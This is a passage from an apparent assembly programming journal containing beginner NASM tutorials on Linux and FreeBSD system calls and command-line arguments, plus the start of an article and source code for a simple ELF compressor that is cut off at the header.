            Sandra E. Eddy                              ISBN: 1-55828-587-3

    Cascading Sytle Sheets - The Definitive Guide
            O'Reilly 2000                               $34.95US
            Eric A. Meyer                               ISBN: 1-56592-622-6

    Win32 Programming Reference (Win32 API Help file)
            Microsoft 1990-1995                         Free
            http://win32asm.rxsp.com/files/win32api.zip

Contact
-------
eet_1024@hotmail.com


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                             Writing A Useful Program With NASM
                                             by Jonathan Leto


Intro
-----
Much fun can be had with assembly programming, it gives you a much deeper
understanding about the inner workings of your processor and kernel. This
article is geared towards the beginning assembly programmer who can't seem to
justify why he is doing something as masochistic as writing an entire program
in assembly language. If you don't already know one or more other programming
languages, you really have no business reading this. Many constructs will also
be explained in terms of C. You should also be familiar with the command line
options of NASM, no sense going over them again here.


Getting Started
---------------
So you want to write a program that actually DOES something. "Hello, world"
isn't cutting it anymore. First, an overview of the various parts of an
assembly program: (For terse documentation, the NASM manual is the place to
go.)


The .data section
-----------------
This section is for defining constants, such as filenames or buffer sizes,
this data does not change at runtime. The NASM documentation has a good
description of how to use the db,dd,etc instructions that are used in this
section.


The .bss section
----------------
This section is where you declare your variables.
They look something like this:

        filename:       resb    255     ; REServe 255 Bytes
        number:         resb    1       ; REServe 1 Byte
        bignum:         resw    1       ; REServe 1 Word (1 Word = 2 Bytes)
        longnum:        resd    1       ; REServe 1 Double Word 
        pi:             resq    1       ; REServe 1 double precision float
        morepi:         rest    1       ; REServe 1 extended precision float


The .text section
-----------------
This is where the actual assembly code is written. The term "self modifying
code" means a program which modifies this section while being executed.


In The Beginning ...
--------------------
The next thing you probably noticed while looking at the source to various
assembly programs, there always seems to be "global _start" or something
similar at the beginning of the .text section. This is the assembly program's
way of telling the kernel where the program execution begins. It is exactly, to
my knowledge, like the main function in C, other than that it is not a
function, just a starting point.


The Stack and Stuff
-------------------
Also like in C, the kernel sets up the environment with all of the environment
variables, and sets up **argv and argc. Just in case you forgot, **argv is an
array of strings that are all of the arguments given to the program, and argc
is the count of how many there are.  These are all put on the stack. If you
have taken Computer Science 101, or read any type of introductory computer
science book, you should know what a stack is. It is a way of storing data so
that the last thing you put in is the first that comes out. This is fine and
dandy, but most people don't seem to grasp how this has anything to do with
their computer. "The stack" as it is ominously referred too, is just your RAM.
That's it.  It is your RAM organized in such a way, so that when you "push"
something onto "The stack", all you are doing is saving something in RAM. And
when you "pop" something off of "The stack", you are retrieving the last thing
you put in, which is on the top.

Ok, now let's look at some code that you are likely to see.

        section .text           ; declaring our .text segment
                global  _start  ; telling where program execution should start

        _start:                 ; this is where code starts getting exec'ed
                pop     ebx     ; get first thing off of stack and put into ebx
                dec     ebx     ; decrement the value of ebx by one
                pop     ebp     ; get next 2 things off stack and put into ebx
                pop     ebp

What does this code do? It simply puts the first actual argument into the ebx
register. Let's say we ran the program on the command line as so:

        $ ./program 42 A

When where are on the _start line, the stack looked something like this:

        -----------
        | 3       |     The number of arguments, including argv[0],
        |         |     which is the program name
        -----------
        |"program"|     argv[0]
        -----------
        | "42"    |     argv[1] NOTE: This is the character "4" and "2",
        |         |     not the number 42
        -----------
        | "A"     |     argv[2]
        -----------

So, the first instruction, "pop ebx", took the 3, and put it into ebx.
Then we decrement it by one, because the program name isn't really an argument.

Depending on if you need to later use the argument count later on, you will see
other arguments put into either the same register or a different one.

Now, "pop ebp" puts the program name into ebp, and then the next "pop ebp"
overwrites it, and puts "42" into ebp. The last value of ebp is not preserved,
and since you have popped it off of the stack, it is gone forever.


Doing more interesting things
-----------------------------
Moving on, how exactly do you interact with the rest of the system? You know
how to manipulate the stack, but how to you get the current time, or make a
directory, or fork a process, or any other wonderful thing a Unix box can do? I
am pleased to introduce you to the "system call". A system call is the
translator that lets user-land programs (which is what you are writing), talk to
the kernel, who is in kernel-land, of course. Each syscall has a unique number,
so that you can put it into the eax register, and tell the kernel "Yo, wake up
and do this", and it hopefully will. If the syscall takes arguments, which most
do, these go into ebx,ecx,edx,esi,edi,ebp , in that order.

Some example code always helps:

        mov     eax,1           ; the exit syscall number
        mov     ebx,0           ; have an exit code of 0
        int     80h             ; interrupt 80h, the thing that pokes the
                                ; kernel and says, "do this"

The preceding code is equivalent to having a "return 0" at the end of your main
function. Ok, ok, still not very useful, but we are getting there.

A more useful example:

        pop     ebx             ; argc
        pop     ebx             ; argv[0]
        pop     ebx             ; the first real arg, a filename


        mov     eax,5           ; the syscall number for open()
                                ; we already have the filename in ebx

        mov     ecx,0           ; O_RDONLY, defined in fcntl.h

        int     80h             ; call the kernel

                                ; now we have a file descriptor in eax

        test    eax,eax         ; lets make sure it is valid
        jns     file_function   ; if the file descriptor does not have the
                                ; sign flag ( which means it is less than 0 )
                                ; jump to file_function

        mov     ebx,eax         ; there was an error, save the errno in ebx
        mov     eax,1           ; put the exit syscall number in eax
        int     80h             ; bail out

Now we are starting to get somewhere. You should be starting to realize that
there is no black magic or voodoo in assembly programming, just a very strict
set of rules.  If you know how the rules work, you can do just about
everything. Though I haven't tried it, I have seen network coding in assembly,
console graphics ( intros! ), and yes, even X windows code in assembly.

So where do find out all of the semantics for all of the various system calls?
Well first, the numbers are listed in asm/unistd.h in Linux, and  sys/syscall.h
in the *BSD's. To find out information about each one, such as what arguments
they take and what values they return, look no further that your man pages! I
will hold your hand in finding out about the next syscall we are going to use,
read().

"man read" didn't give you exactly what you wanted did it? That is because
program manuals and shell manuals are shown before the programming manuals are.
If you are using bash, you probably are looking at the BASH_BUILTINS(1) man
page. To get to what you really want, try "man 2 read".  Now you should be
looking at sections like SYNOPSIS, DESCRIPTION, DESCRIPTION, ERRORS and a few
others. These are the most important. Take a look at synopsis, it should look
like:

        ssize_t read(int fd, void *buf, size_t count);

NOTE: ssize_t and size_t are just integers.

The first argument is the file descriptor, followed by the buffer, and then how
many bytes to read in, which should be however long the buffer is. For the best
performance, use 8192, which is 8k, as your count. Make your buffer a multiple
of this, 8192 is fine. Now you know what to put in your registers. Reading the
RETURN VALUE section, you should see how read() returns the number of bytes it
read, 0 for EOF, and -1 for errors.

file_function:
        mov     ebx,eax         ; sys_open returned file descriptor into eax
        mov     eax,3           ; sys_read
                                ; ebx is already setup
        mov     ecx,buf         ; we are putting the ADDRESS of buf in ecx
        mov     edx,bufsize     ; we are putting the ADDRESS of bufsize in edx

        int     80h             ; call the kernel

        test    eax,eax         ; see what got returned
        jz      nextfile        ; got an EOF, go to read the next file
        js      error           ; got an error, bail out

                                ; if we are here, then we actually read some
                                ; bytes

Now we have a chunk of the file read ( up to 8192 bytes ), and sitting in what
you would call an array in C. What can you do now? Well, the first thing that
comes to mind is print it out.  Wait a sec, there is no man page for printf in
section 2. What's the deal? Well, printf is a library function, implemented by
good ol' libc. You are going to have to dig a little deeper, and use write().
So now you looking at the man page. write() writes to a file descriptor. What
the hell good does that do me? I want to print it out! Well, remember,
everything in Unix is a file, so all you have to do is write to STDOUT. From
/usr/include/unistd.h, it is defined as 1 . So the next chunk of code looks
like:

        mov     edx,eax         ; save the count of bytes for the write syscall
        mov     eax,4           ; system call for write
        mov     ebx,1           ; STDOUT file descriptor
                                ; ecx is already set up
        int     80h             ; call kernel

        ; for the program to properly exit instead of segfaulting right here
        ; ( it doesn't seem to like to fall off the end of a program ), call
        ; a sys_exit

        mov     eax,1
        mov     ebx,0
        int     80h

What you have now just written is basically "cat", except it only prints the
first 8192 bytes.


Portability
-----------
In the preceding section, you saw how the call the kernel in Linux with NASM.
This is fine if you are never ever going to use another operating system, and
you enjoy looking up the system kernel numbers, but is not very practical, and
extremely unportable. What to do?  There is a great little package called
asmutils started by Konstantin Boldyshev, who runs
http://www.linuxassembly.org. If you haven't read all of the good documentation
on that site, that should be your next step. Asmutils provides an easy to use
and portable interface to doing system calls in whichever Unix variant you use
( and even has support for BeOS.)  Even if you aren't interesting in using
these Unix utilities that are rewritten in assembly, if you want to write
portable NASM code, you are better off using it's header files than rolling
your own.  With asmutils, your code will look like this:

        %include "system.inc"   ; all the magic happens here

        CODESEG                 ; .text section

        START:                  ; always starts here

        sys_write STDOUT,[somestring],[strlen]

        END                     ; code ends here

This is much more readable then doing everything by system call number, and it
will be portable across Linux,FreeBSD,OpenBSD,NetBSD,BeOS and a few other
lesser known OS's. You can now use system calls by name, and use standard
constants like STDOUT or O_RDONLY, just like in C.  The "%include" statement
works precisely as it does in C, sourcing the contents of that file.

To learn more about how to use asmutils, read the Asmutils-HOWTO, which is in
the doc/ directory of the source. Also, to get the latest source, use the
following commands:

export CVS_RSH=ssh
cvs -d:pserver:anonymous@cvs.linuxassembly.org:/cvsroot/asm login
cvs -z3 -d:pserver:anonymous@cvs.linuxassembly.org:/cvsroot/asm co asmutils

This will download the newest, bleeding edge source into a subdirectory called
"asmutils" of your current directory. Take a look at some of the simpler
programs, such as cat,sleep,ln,head or mount, you will see that there isn't
anything horrendously difficult about them. head was my first assembly program,
I made extra comments on purpose, so that would be a good place to start.


Debugging
---------
Strace will definitely by your friend. It is the easiest tool to use to debug
your problem. Most of the time when writing in assembly, other that syntax
errors, you will just get a segmentation fault. This provides you with a ZERO
useful information. With strace, at least you will see after which system call
your program is choking. Example:

        $ strace ./cal2
        execve("./cal2", ["./cal2"], [/* 46 vars */]) = 0
        read(1, "", 0)                          = 0
        --- SIGSEGV (Segmentation fault) ---
        +++ killed by SIGSEGV +++

Now you know to look after your first read system call. But it starts getting
tricky when you have lots of pure assembly, which strace cannot show. That's
when gdb comes into play. There is some very good information about using gdb
and enabling debugging information in NASM in the Asmutils-HOWTO, so I won't
reproduce it here. For a quick and dirty solution, you could do something like
this:

        %define notdeadyet      sys_write STDOUT,0,__LINE__

Now you can litter the source with notdeadyet's, and hopefully see where things
are going astray with the help of strace. Obviously this is not practical for
complex bugs or voluminous source, but works great for finding careless
mistakes when you are starting out. Example:

        $ strace ./cal2
        execve("./cal2", ["./cal2"], [/* 46 vars */]) = 0
        write(1, NULL, 16)                      = 16
        write(1, NULL, 26)                      = 26
        write(1, NULL, 41)                      = 41
        --- SIGSEGV (Segmentation fault) ---
        +++ killed by SIGSEGV +++

Now we know that we are still going on line 41, and the problem is after that.


Next ?
------
Now it is your turn to explore the insides of your operating system, and take
pride in understanding what's really going on under the covers.


Reference
---------
Places to get more information:

     Linux Assembly - http://www.linuxassembly.org
     NASM Manual ( available in doc/html directory of source )
     Assembly Programming Journal - http://asmjournal.freeservers.com/
     Mammon_'s textbase - http://www.eccentrica.org/Mammon/sprawl/textbase.html
     Art Of Assembly - http://webster.cs.ucr.edu/Page_asm/ArtOfAsm.html
     Sandpile - http://www.sandpile.org
     comp.lang.asm.x86
     NASM - http://www.cryogen.com/Nasm
     Asmutils-HOWTO - doc/ directory of asmutils


Feedback
--------
Feedback is welcome, hopefully this was of some use to budding Unix assembly
programmers.


Availability
------------
The most current version of this document should be available at
http://www.leto.net/papers/writing-a-useful-program-with-nasm.txt .


Appendix : Jumps
----------------
When I first began looking at assembly source code, I saw all these crazy
instructions like "jnz" and the like. It looked like I was going to have to
remember the names of a whole slew of inanely named instructions. But after a
while it finally clicked what they all were. They are basically just "if
statements" that you know and love, that work off of the EFLAGS register. What
is the EFLAGS register? Just a register with lots of different bits that are
set to zero or one, depending on the previous comparison that the code made.

Some code to set the stage:

        mov     eax,82
        mov     ebx,69

        test    eax,ebx
        jle     some_function

What on earth is "jle"? Why it's "Jump if Less than or Equal." If eax was less
than or equal to ebx, code execution will jump to "some_function", if not, it
keeps chugging along. Here is a list which will hopefully shed some light on
this part of assembly that was mysterious to me when I began. Some of these are
logically the same, but are provided because is some situations one will be
more intuitive than the other.

Jump                 Meaning            Signedness (S or U)
-----------------------------------------------------------
ja      | Jump if above                 |       U
jae     | Jump if above or Equal        |       U
jb      | Jump if below                 |       U
jbe     | Jump if below or Equal        |       U
jc      | Jump if Carry                 |
jcxz    | Jump if CX is Zero            |
je      | Jump if Equal                 |
jecxz   | Jump if ECX is Zero           |
jz      | Jump if Zero                  |
jg      | Jump if greater               |       S
jge     | Jump if greater or Equal      |       S
jl      | Jump if less                  |       S
jle     | Jump if less or Equal         |       S
jmp     | Unconditional jump            |
jna     | Jump Not above                |       U
jnae    | Jump Not above or Equal       |       U
jnc     | Jump if Not Carry             |
jncxz   | Jump if CX Not Zero           |
jne     | Jump if Not Equal             |
jng     | Jump if Not greater           |       S
jnge    | Jump if Not greater or Equal  |       S
jnl     | Jump if Not less              |       S
jnle    | Jump if Not less or Equal     |       S
jno     | Jump if Not Overflow          |
jnp     | Jump if Not Parity            |
jns     | Jump if Not signed            |
jnz     | Jump if Not Zero              |
jo      | Jump if Overflow              |
jp      | Jump if Parity                |
jpe     | Jump if Parity Even           |
jpo     | Jump if Parity Odd            |
js      | Jump if signed                |
jz      | Jump if Zero                  |
-----------------------------------------------------------


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                                        Command Line in FreeBSD
                                                        by G. Adam Stanislav


In my Issue 8 article I mentioned I did not know how command line parameters
(or arguments) were passed to programs under FreeBSD. I have received some
feedback, both from the FreeBSD community and APJ readers.

Thanks to that feedback, I can now pass this information on to you. Further,
this information should be valid, more or less, for all 386 based Unix and
Unix-like operating systems. At any rate, if your Unix variety does not come
with the information on its command line parameters, chances are that, if you
adjust my sample code to use the kernel interface of your OS, it will work just
fine.


Code startup
------------
Unix is much more security-conscious than MS DOS and MS Windows. While
DOS/Windows assembly language programmers may be used to the operating system
loading their code and then CALLing it (so you can exit with a simple RET, and
possibly crash the system), Unix creates a new process for each program. This
process is separate from the kernel and from all other processes. Hence, the
system does not CALL your code, it JMPs to it. If you issue a RET, you will
crash your program, but Unix will continue running unharmed. At least that's
the theory. However, under FreeBSD it is the practice as well: I tried it and
can vouch for it.


The top of the stack
--------------------
Before the Unix system jumps to your code, it pushes some information on the
top of the stack: Your stack, that is, not system stack, so you can access it
all from your own code. Here is what the stack contains, starting at the top:

        number of arguments ("argc")
        argument 0
        argument 1
        ...
        argument n (n = argc - 1)
        NULL pointer
        environment 0
        environment 1
        ...
        environment n
        NULL pointer

Not all of these are necessarily there (e.g., if the program was called with no
arguments). However, the number of arguments, argument 0, and the two NULL
pointers are always present.

Argument 0 is not a command line parameter in the sense DOS programmers are
used to find. Instead, it is the name of the program. C programmers will find
it as the familiar argv[0].

Another important difference between DOS and Unix is that DOS programs just
give you the full command line, i.e., whatever appears after the name of the
program, including any leading and trailing blanks. It is then up to the
programmer to strip all extra blanks.

Compared to that, parsing the Unix command line is much simpler as the system
does some of the hard work for you. The individual arguments are separated, and
usually contain no leading/trailing blanks. When they do, they are there
because the program caller wanted them there.

Let me illustrate. Suppose the user has typed the following command:

        ./args Hello, world. Here I come!

In that case, the top of the stack will look like this:

        6
        ./args
        Hello,
        world.
        Here
        I
        come!
        0
        environment 0
        environment 1
        ...
        environment n
        0

The arguments are nicely separated and contain no blanks. Now, suppose the user
has typed:

        ./args Hello, world. "Here I come!"

The top of the stack looks like this:

        4
        ./args
        Hello,
        world.
        Here I come!
        0
        (etc)

This system, besides making it easier to parse, has a great advantage over the
DOS way: It has no practical limit on the size of the command line.

Accessing the information
-------------------------
Because your program runs in its own process space, the stack is yours to do
with as you please. You can simply save the information in some data structure
and leave the stack intact, or you can pop it off as you need it.

The C startup code uses the first approach: It saves the "argc" value in a
local variable, the argument 0 in another. It finds the start of the
environment variable list and stores it in a global variable. It then calls
main, passing that information to it, i.e. main(argc, *argv[], env);

The assembly language program can do that as well, but usually has no need to.
If you process the command line at the start of your code, and never need to
see it again, you can just pop it off the stack one by one, analyze it, set up
any flags or other variables, etc.

I have enclosed a simple assembly language program called args.asm below. All
it does is print all the information the FreeBSD system has passed to it. It is
useful as an example of one way of accessing the command line arguments (and
the environment) by simply popping it off one at a time.

It is also useful as a tool to study what format the arguments are in. For
example, running it will show you that the environment is passed to your
program in the form of name=value, where name is the name of the environment
variable, value is whatever text string is assigned to it.

You can assemble and link the program with NASM:

        nasm -f elf args.asm
        ld -o args args.o
        strip args

Try running it with and without command line arguments. Try placing the
arguments in single and double quotes, try all the nifty things a Unix shell
will let you do, such as:

        ./args $HOME
        ./args `ls -la`
        ./args "`ls -la`"
        ./args '`ls -la`'
        ./args
        ./args Hello, world. Here I come!
        ./args Hello, world. "Here I come!"
        ./args '      Hello,    world.   Here    I   come !   '

;-----------------------------------------------------------------------------;
; args.asm
;
; Print FreeBSD command line arguments and environment
;
; Copyright 2000 G. Adam Stanislav
; All rights reserved
;-----------------------------------------------------------------------------;

section .data

prgmsg  db      'Program name:', 0Ah, 0Ah
tab     db      9
prglen  equ     $-prgmsg
argmsg  db      0Ah, 0Ah, 'Command line arguments:', 0Ah, 0Ah
arglen  equ     $-argmsg
envmsg  db      0Ah, 'Environment variables:', 0Ah, 0Ah
envlen  equ     $-envmsg
huhmsg  db      "Hmmm... Something's wrong here...", 0Ah
huhlen  equ     $-huhmsg

section .code

what.the.heck:
        ; Print the huhmsg to stderr and abort.
        push    dword huhlen
        push    dword huhmsg
        sub     eax, eax
        mov     al, 2           ; stderr
        push    eax
        add     al, al          ; SYS_write
        push    eax
        int     80h
        ; No need to clean up the stack since we're quitting now.

        sub     eax, eax
        inc     al              ; return 1 (failure), SYS_exit
        push    eax
        push    eax
        int     80h

; ELF programs always start at _start
global  _start
_start:
        ; We come here with "argc" on the top of the stack. Its value
        ; is at least 1. If not, something went seriously wrong.
        pop     ecx             ; ECX = argc
        jecxz   what.the.heck

        ; Print the prgmsg
        sub     eax, eax
        push    dword prglen
        push    dword prgmsg
        inc     al              ; stdout
        push    eax
        push    eax
        mov     al, 4           ;SYS_write
        int     80h
        add     esp, byte 16

        ; Get argv[0], i.e., the program path
        pop     ebx             ; EBX = argv[0]

        ; argv[0] is a NUL-terminated string. We can find its
        ; length by scanning for the NUL.
        sub     eax, eax
        sub     ecx, ecx
        cld
        dec     ecx
        mov     edi, ebx
repne   scasb
        not     ecx
        dec     ecx

        ; Print the string
        push    ecx
        push    ebx
        inc     al                      ; stdout
        push    eax
        push    eax
        mov     al, 4
        int     80h
        add     esp, byte 16

        ; Print the argmsg
        sub     eax, eax
        push    dword arglen
        push    dword argmsg
        inc     al                      ; stdout
        push    eax
        push    eax
        mov     al, 4                   ; SYS_write
        int     80h
        add     esp, byte 16

        ; By now, we have no idea what the value of argc was.
        ; We did not save it because we don't need it.
        ; The top of the stack now contains pointers
        ; to command line arguments (if any), followed
        ; by a NULL pointer.
        ;
        ; We simply print everything before the NULL.

.argloop:
        pop     ebx             ; next argument
        or      ebx, ebx
        je      .env            ; NULL pointer

        ; Print a tab
        sub     eax, eax
        inc     al
        push    eax
        push    dword tab
        push    eax             ; stdout
        mov     al, 4           ; SYS_write
        push    eax
        int     80h
        add     esp, byte 16

        ; Find the length
        sub     ecx, ecx
        sub     eax, eax
        dec     ecx
        mov     edi, ebx
repne   scasb
        not     ecx

        ; Append a new line
        mov     byte [edi-1], 0Ah

        ; Print the string
        push    ecx
        push    ebx
        inc     al              ; stdout
        push    eax
        mov     al, 4           ; SYS_write
        push    eax
        int     80h
        add     esp, byte 16
        jmp     short .argloop  ; next

.env:
        ; Print the envmsg
        sub     eax, eax
        push    dword envlen
        push    dword envmsg
        inc     al              ; stdout
        push    eax
        push    eax
        mov     al, 4           ; SYS_write
        int     80h
        add     esp, byte 16

        ; The top of the stack now contains pointers to
        ; environment variables, followed by a NULL pointer.
        ; We do what we did for the arguments:

.envloop:
        pop     ebx
        or      ebx, ebx
        je      .exit

        sub     eax, eax
        inc     al
        push    eax
        push    dword tab
        push    eax
        mov     al, 4
        push    eax
        int     80h
        add     esp, byte 16

        sub     ecx, ecx
        sub     eax, eax
        dec     ecx
        mov     edi, ebx
repne   scasb
        not     ecx
        mov     byte [edi-1], 0Ah

        push    ecx
        push    ebx
        inc     al
        push    eax
        mov     al, 4
        push    eax
        int     80h
        add     esp, byte 16
        jmp     short .envloop

.exit:
        sub     eax, eax        ; return 0 (success)
        push    eax
        inc     al              ; SYS_exit
        push    eax
        int     80h

;--- End of program ----------------------------------------------------------;


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                                               Compressing data
                                                               by Feryno Gabris


First, intro about decompress. It's needed a routine called "get_next_bit".
Here are 3 examples:

;-----
get_next_bit:
        add     dl,dl
        jnz     no_new_byte
        lodsb
        mov     dl,al
        adc     dl,dl
no_new_byte:
        ret
;-----
get_next_bit:
        shl     bx,1
        jnz     no_new_word
        mov     bx,word [esi]
        inc     esi
        inc     esi
        rcl     bx,1
no_new_word:
        ret
;-----
get_next_bit:
        shl     ebp,1
        jnz     no_new_dword
        lodsd
        rcl     eax,1
        xchg    ebp,eax
no_new_dword:
        ret
;-----

And this is the usage of get_next_bit:

;-----
        mov     esi,control_bits_offset
        mov     edi,place_for_store_decompressed_bytes
        cld
        mov     dl,80h
B0:     call    get_next_bit
        jc      L1
L0:     ... some decompress instructions ...
        jmp     B0
L1:     ... some decompress instructions ...
        jmp     B0

get_next_bit:
        add     dl,dl           ; this is instruction for put next bit to Carry
                                ; highest bit will be become to Carry Flag and
                                ; all lower bits are shifted left by 1
        jnz     no_new_byte
; next 3 instructions handle: all control_bits are processed and removed
        lodsb                   ; load new control_byte with 8 control_bits
        xchg    edx,eax         ; swap to another register only
        adc     dl,dl           ; puth highest control_bit to Carry
                                ; shift all bits left by 1
                                ; recycle highest bit by MOV DL,80h ( bit=1
                                ; become to lower bit (bit 0.) )
no_new_byte:
        ret
;-----

Note about two instructions: MOV DL,80h and ADC DL,DL.
MOV DL,80h set up first control_bit, but this isn't true control_bit used for
switch decompress between L0 and L1. Binary, 80h = 10000000b and highest bit
(bit 7.) of 80h is bit=1 . All other bits=0 (bits 6. 5. 4. 3. 2. 1. 0.).
Highest bit name can be as helper_control_bit. Helper_control_bit is never
destroyed until decompress process ends. Helper_control_bit recycle through
instruction ADC DL,DL after each loaded bits (8 bits by LODSB, 32 by LODSD) are
used (after 8 times call get_next_bit with LODSB - 1st example procedure or
32 times call get_next_bit with LODSD 3nd example procedure).
Image of first call get_next_bit and call get_next_bit after use and remove all
control_bits is similar:

Status is: DL register = 80h = 10000000b

Here is instructions run:

1.      ADD     DL,DL
        80h + 80h = 00h CarryFlag=1 ZeroFlag=1 (in Carry is helper_control_bit)

2.      LODSB
        load control_byte with 8 control_bits, this instruction dont touch
        Carry

3.      XCHG    EDX,EAX
        swap control_byte to DL register, this instruction don't touch Carry
        (note that instructions PUSH,POP,MOV,XCHG,INC,LODSB,... don't change
        Carry)

4.      ADC     DL,DL
        recycle helper_control_bit, shift all bits left by 1 and new highest
        control_bit become to Carry

This may be the most difficult part of decompress for understand. OK, next...
Instructions on L0 and L1 can be as:

L0:     MOVSB
        JMP     B0
L1:     ... calculate ECX
        ... calculate EBX (delta, shift)
        PUSH    ESI
        MOV     ESI,EDI
        SUB     ESI,EBX
        REPZ MOVSB
        POP     ESI
        JMP     B0

First mode, L0, isn't true decompress mode. Byte isn't compressed and it will
be moved only. This mode has bad pack ratio, but must be used for store some
bytes that can't be decompressed by L1 mode. It use 1 byte + 1 bit = 9 bits for
store 1 byte = 8 bits.

Second mode, L1, is true decompress mode. It calculate ECX number of bytes for
decompress and calculate EBX, value that can be named as DELTA or SHIFT. This
assume that chain of ECX bytes is on positions [EDI] and [EDI-EBX] in DATA
bytes and ASM code like:

        MOV     ESI,EDI
        SUB     ESI,EBX
        REPZ CMPSB

In data bytes compression process return with ZeroFlag=1 and ECX=0.
It has good pack ratio, better for large chains (big ECX) and small shift
(small EBX). Methods for calculate ECX and EBX are similar:

It's lucid that ECX as well EBX aren't zero (ECX<>0 EBX<>0) hence highest bit
of register is bit=1.

First instruction for calculate ECX setup highest bit=1 and all next bits will
be put by call get_next_bit. First instruction is:

        MOV     ECX,1

or INC ECX if ECX=0.

Next instructions are:

        CALL    GET_NEXT_BIT
        ADC     ECX,ECX                 ; as well RCL ECX,1 can be used

How to terminate calculate ECX ? Again through use call get_next_bit !
Here is full routine for calculate ECX in decompress:

        MOV     ECX,1
LCC0:   CALL    GET_NEXT_BIT
        ADC     ECX,ECX
        CALL    GET_NEXT_BIT
        JC      LCC0

A minimal value ECX=2 can be produced by this code. ECX=1 isn't needed because
this handle L0 mode (MOVSB) and L0 is more rational (but has bad pack ratio)
for pack 1 byte as L1 mode.

Example for calculate ECX=5=101b
Highest bit is by INC ECX and i remove it - binary 01b
Bit sequence for calculate ECX=5 is 01 10 binary.

Calculate ECX=110100b
Remove highest bit (this bit put INC ECX in decompress) - binary 10100b
Bit sequence for calculate ECX is 11 01 11 01 00 binary.

Calculate ECX=2=10b. Bit sequence is 0 0 binary.
Calculate ECX=3=11b. Bit sequence is 1 0 binary.
Calculate ECX=4=100b. Bit sequence is 0 1 0 0 binary.
Calculate ECX=5=101b. Bit sequence is 0 1 1 0 binary.
Calculate ECX=6=110b. Bit sequence is 1 1 0 0 binary.
Calculate ECX=7=111b. Bit sequence is 1 1 1 0 binary.
Calculate ECX=8=1000b. Bit sequence is 0 1 0 1 0 0 binary.
Calculate ECX=16=10000b. Bit sequence is 0 1 0 1 0 1 0 0 binary.
Calculate ECX=17=10001b. Bit sequence is 0 1 0 1 0 1 1 0 binary.
Calculate ECX=18=10010b. Bit sequence is 0 1 0 1 1 1 0 0 binary.
Calculate ECX=19=10011b. Bit sequence is 0 1 0 1 1 1 1 0 binary.

Calculate EBX has some similar steps but some other steps.
EBX can be EBX=1 and can be done as:

        MOV     EBX,1
LCD0:   CALL    GET_NEXT_BIT
        ADC     EBX,EBX
        CALL    GET_NEXT_BIT
        JC      LCD0
        DEC     EBX

But by experients, it's often EBX>16 and for EBX<16 can be used another
decompress mode. Calculate EBX=15 require 8 bits = 1 byte by use upper codes.
It's a better use 8 bits = 1 byte for fill BL in EBX and calculate all bits
highest of BL ( bits 31. - 8. ) by mode similar as calculate ECX.
Here is it:

        MOV     EBX,1
LCD0:   CALL    GET_NEXT_BIT
        ADC     EBX,EBX
        CALL    GET_NEXT_BIT
        JC      LCD0
        DEC     EBX
        DEC     EBX
        SHL     EBX,8
        MOV     BL,byte [ESI]
        INC     ESI

Note that at least 2 times DEC EBX must be used for make EBX=0 possibility
before SHL EBX,8 shift all bits higher and free BL.

It's a mode named without_change_delta. Principle is 3 times use DEC EBX after
calculate EBX=2. Calculate EBX=-1 indicate that calculate new delta isn't
needed and old delta can be used. Old delta can be saved to unused register or
stack by previous SUB ESI,EBX REPZ MOVSB and restored by mode
without_change_delta.

Principle of mode for pack 2-3 bytes with delta from 1 to 7Fh:

1. Load 1 byte = 8 bits
2. bit 0. = 1 indicate packed 2 bytes
   bit 0. = 0 indicate packed 3 bytes
3. high 7 bits ( bits 7. - 1. ) is delta

Here is code example

        XOR     EBX,EBX ; (EBX=0)
        MOV     ECX,1   ; (ECX=1)
        MOV     BL,[ESI]
        INC     ESI
        SHR     BL,1    ; this explore bit 0. and shift bits to make EBX=delta
        SBB     CL,0
        INC     ECX
        INC     ECX

It's lucid that result BL=0 after this code is impossible delta. I make use of
this for TERMINATE decompress process.

A nice idea for pack 1 byte with delta from 1 to 15:

        XOR     EBX,EBX
        MOV     ECX,1
U02:    MOV     BL,00010000b
        CALL    GET_NEXT_BIT
        ADC     BL,BL
        JNC     U02

Result EBX=0 is impossible delta and is used for pack byte 00h. This byte 00h
is the most frequent byte in 32-bit opcodes. Last code continue...

        JNZ     STORE_1_BYTE
        XCHG    EBX,EAX ; make EAX=0 in 1 byte 32-bit opcode
        JMP     STORE_BYTE
        ...
STORE_1_BYTE:
        NEG     EBX
        MOV     AL,[EDI+EBX]
STORE_BYTE:
        STOSB

This is all about decompress intro. It's a part not implemented in decompress
meanwhile. This is part like:

                CMP     EBX,7D00h
                JNC     ZVYS_O_DVE
                CMP     EBX,500h
                JNC     ZVYS_O_JENNU
                JMP     NYST_NEZVYSUJ
ZVYS_O_DVE:     INC     ECX
ZVYS_O_JENNU:   INC     ECX
NYST_NEZVYSUJ:

It's not rational compress 2 bytes with delta > 4FFh because this request
2+(3*2)+8+2 = 18 bits and this can be done with 2 times use MOVSB mode (2*9=18
bits).

U00:    movsb                   ; require 1 byte = 8 bits
        call    get_next_bit    ; require 1 bit
        jnc     U00

It's rational compress 4 bytes with delta > 7CFFh because this request
2+(8*2)+8+(2*2) = 28 bits without, 26 bits with this implementation.


Intro for COMPRESS...
---------------------
Some equivalents:

DECOMPRESS         COMPRESS
MOV DL,80h         CALL o_c_0         ; setup helper_control_bit
CALL GET_NEXT_BIT  CALL PUT_BIT

Routines for scan chains, calculate bit request for pack this chain, pack
chain, some optimalizations for found better chains are in source code.

Source is ELF compressor, but this isn't universal ELF compressor. It support
ELF header included in the source only. This header is enough for LINUX NASM
use. You can download sources as well binaries from:

http://feryno.home.sk/projects/compressELF.tar.gz

; ----- CUT HERE -----

; fy1ename: a00.asm
; dezkrypt: ASM, ELF, k0mprezz0r, myny, exekutab1e
; Au~tchor: ch lap aj   Feryno
; kompy1e:
; nasm -f bin a00.asm
; chmod +x a00
; example of use
; ./a00 a00 compressed_a00
; this self compress compressor

BITS 32

                org     08048000h

ehdr:                                           ; Elf32_Ehdr
                db      7Fh, 'ELF', 1, 1, 1     ;   e_ident
        times 9 db      0
                dw      2                       ;   e_type
                dw      3                       ;   e_machine
                dd      1                       ;   e_version
                dd      START                   ;   e_entry
                dd      phdr - $$               ;   e_phoff
                dd      0                       ;   e_shoff
                dd      0                       ;   e_flags
                dw      ehdrsize                ;   e_ehsize
